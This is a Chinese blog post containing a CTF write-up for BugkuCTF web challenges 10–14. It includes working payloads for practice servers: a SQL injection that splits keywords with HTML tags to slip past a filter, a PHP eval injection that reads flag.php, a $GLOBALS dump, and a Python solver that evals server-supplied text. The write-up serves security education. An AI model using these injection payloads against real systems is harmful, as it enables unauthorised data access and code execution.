bugkuCTF Writeup (Web)10-14

最新推荐文章于 2024-08-16 17:02:56 发布
最新推荐文章于 2024-08-16 17:02:56 发布
阅读量4.1k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: CTF Python Web SQL zh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/troublor/article/details/79153286
版权

SQL注入1

第十题
代码审计
这里写图片描述
先过滤sql关键字,再过滤xss(实际上就是删除一些html标签),这个顺序就很好办了,把HTML标签插到sql关键字里面,就绕过了第一个过滤,第二个过滤之后就还原了sql关键字
之后就是基本的判断字段数、爆数据库名、爆flag
payload:http://103.238.227.13:10087/?id=1 uni<html>on s<html>elect id,hash fr<html>om sql3.key%23
还要注意的是获得的字段值要加上KEY{}再提交

你必须让他停下

第十一题
看源码,使用js的setTimeout函数自动刷新,那就禁用js
用浏览器禁用当前host的js,然后手动刷新,直到刷出来flag
PS:说是要在熊猫的那一张停下,出现熊猫是随机的,所以要刷几次才行,而且flag是在html里面隐藏的,得看着源码刷新才行

本地包含

第十二题
又是代码
代码
flag在”flag.php”这个文件里,只要按这个样把flag.php的内容显示出来就行了
eval执行里面的代码,而且是递归的
于是传入参数hello=show_source(DIR.”/flag.php”)
payload:http://120.24.86.145:8003/?hello=show_source(__DIR__.%22/flag.php%22)
有flag了
flag

变量1

第十三题
和上面一题差不多,只不过多了一点过滤
代码
有flag in the variable的提示,那就是要看变量了
这里通过php预定义变量来看flag1.php中加载的变量
传入参数args=GLOBALS
payload:http://120.24.86.145:8004/index1.php?args=GLOBALS
在输出的$GLOBALS变量内容里就有flag
flag

秋名山老司机

第十四题
两秒内计算这么一坨算式,肯定是要写脚本的
这里写图片描述
再刷一下就发现要用post传入value参数
这里写图片描述
于是跑python脚本,值得注意的是发送http请求的时候要打开Session支持,不然服务器不认为两次请求是同一个电脑发来的

import re
import requests

s = requests.Session()
r = s.get("http://120.24.86.145:8002/qiumingshan/")
searchObj = re.search(r'^<div>(.*)=\?;</div>$', r.text, re.M | re.S)
d = {
    "value": eval(searchObj.group(1))
}
r = s.post("http://120.24.86.145:8002/qiumingshan/", data=d)
print(r.text)

有flag 了
这里写图片描述
(不要在意乱码的那些细节)

Troublor
关注
专栏目录
Bugku-加密-writeup
The Road Of Sec
04-28 1128
easy_crypto 0010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1 0 010 0 000 1 01111 10 11110 101011 1111101 莫斯电码 0010—>…-. from __future__ import prin...
BUGKU web--writeup
Sanky0u的博客
08-15 1万+
因为已经看到过很多关于bugku平台上面web题的writeup,我想自己就不需要每道题都写了,只写自己比较有收获的几题的writeup,并且将自己收集到的好几种解法都放上来。1. 文件上传测试这道题提示上传php文件,但选择php文件上传的时候又提示非图片文件。解法1:将一个php文件的后缀名改成.php.jpg或者.php.png,然后选择这个文件,点击上传的时候用burpsuite抓包,改文件
BUGKU writeup
CHOOOU的博客
08-06 1万+
Reverse easy_vb soeasy easy_re f5查看v4和v5的值,再将十六进制转换成字符就行了 游戏过关 解题有好几种方式 1. 搜done,看到一个函数sub_45E940,F5,分析函数的内容,当然我不是这样做的,感觉麻烦 2. 修改程序逻辑,使得输入任意数直接弹flag,搜索loc_45F5B7,这个函数是判断是否满足灯全亮什么的,往下滑,下一...
Bugku web-你必须让他停下来解题过程
最新发布
2401_86440467的博客
08-16 600
尝试关闭JS(直接使用渗透版火狐将JS关闭),发现确实停下来了,但是flag还是没有出现。这时候知道,原网页停下来不重要,访问环境后,直接打开源代码不断刷新,flag即可出现。访问环境后发现网页一直在不断刷新,并且提示需要停下来,没什么思路,查看页面源代码。但是同时发现,jpg改变了,试着直接刷新源代码,发现jpg随刷新改变。猜测,有一个jpg对应flag,不断刷新,找到flag。发现使用JS,并且提示flag好像就这源代码中。(关闭JS方法还有其它,这里不过多赘述)
Bugku writeup
weixin_44119209的博客
03-03 546
Bugku题目writeup(一) 一些小的体会 在做ctf题目时要选择合适的浏览器,火狐或者是谷歌,一些常用插件搞搞清楚,前期做题靠工具,后期做题靠实力,注意自身知识的积累与总结 一.杂项 1.签到题 关注得到flag 2.这是一张单纯的图片 用winhex打开图片,发现一串数字,ascll码转码,得到flag 3.猜 百度有一个智能识图功能,识别一下,刘亦菲的大名就出来了 二.WEB 1....
Bugku web Writeup
weixin_44522540的博客
02-25 831
靶场链接:https://ctf.bugku.com/index.html 文章目录前言一、web2 随机数字运算验证码二、web3 $_GET三、web4 $_post四、web5 矛盾    0x01知识点    0x02实践五、web6 flag就在这里六、web7 你必须让他停下七、web11 webshell八、web12 本地管理员九、web8 文件包含    0x01知识点
bugku-writeup-web-好像需要密码
dark的博客
06-15 1134
bugku-web15解题思路记录。” 题目:好像需要密码
bugku-writeup-web-社工-初步收集
dark的博客
06-18 726
题目:社工-ch
bugku-writeup-web-文件包含
热门推荐
dark的博客
06-14 1万+
bugku-web13解题思路记录。” 题目:click me? no
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 3886
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
bugkuCTF Writeup (Web)1-9
Troublor的博客
01-23 1906
签到题 加群就行了,没卖什么关子:) Web2 花里胡哨的果断去看源码。。。 flag就在这了 文件上传测试 就按照上面说的,传一个php试试 提交后说:非图片文件 那就是既要是图片又要是php了 暂时不知道它是怎么判断是图片是php文件的,先试试再说 用Fiddler抓包 先改一改文件扩展名试一试吧 后缀改成jpg之后,仍然提示是非
bugku杂项题writeup
11-22
bugku杂项题writeup
Bugku WEBWriteUp
zzr2zr的博客
12-01 393
Bugku WEBWriteUp 1.cookies欺骗 http://123.206.87.240:8002/web11/ 答案格式:KEY{xxxxxxxx} 打开链接什么都没发现,观察url发现末尾是base64加密的字符串,解码后是keys.txt 接着尝试用filename访问index.php(这里index.php也要使用base64进行编码),同时给line(行数)一个参...
BugKu-Web 部分 Writeup
FFY's Blog
07-08 565
web2 查看源码,得 flag:KEY{Web-2-bugKssNNikls9100} 计算器 要求提交算式得结果,用 JS 验证 查看源码,发现可能是 code.js 然后进入查看,发现 flag:flag{CTF-bugku-0032} 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) ...
bugku writeup 前女友/login1
Ares-T的博客
04-02 2070
知识点:md5函数数据类型错误返回false(两个md5都返回false时相等),strcmp函数比较i出错返回0(与相等返回一样),sql约束攻击:sql会自动填充空格达到相同长度后再进行比较,sql会截取前n个字符直接进行比较前女友:http://118.89.219.210:49162/flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}打开网址后发现是一大段文字查看源码发现第2...
bugku】做个游戏 writeup
perye
02-26 3327
拿到题目,下载jar。直接解压拿到三个文件用反编译工具查看源代码在PlaneGameFrame这个类中成功找到flag
[CTF]Bugku Web Writeup (1)
第八个男人
12-19 235
1. web1 直接F12。
bugkuctf-web(Writeup)
alert['Hello World']
11-07 3608
目录web2计算器计算器 web2 题目: http://123.206.87.240:8002/web2/ Writeup: #查看页面源代码 ctrl + U F12 view-source: 计算器 题目: http://123.206.87.240:8002/yanzhengma/ Writeup: 正确答案是两位数字,maxlength限制了我们输入的字数,只允许输入1位。 由于前端代码在我们浏览器加载的,我们可以随意控制前端代码,修改maxlength大一些,再输入正确答案,即可获取f
bugku{web writeup笔记}
baidu_39504221的博客
10-19 247
web2 F12看一下 计算器 发现这里只能写一位 按F12把下图的maxlength改一下再输入 web基础$_GET 依照题意提交一个get请求 web基础$_POST 这里则是提交一个post 可以用火狐的插件hackbar,也可以用在线工具 没有hackbar我就用在线工具了 矛盾 依照题意需要提交一个get参数num,需要num不是数字才能进入第一个if语句,有需要num==...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值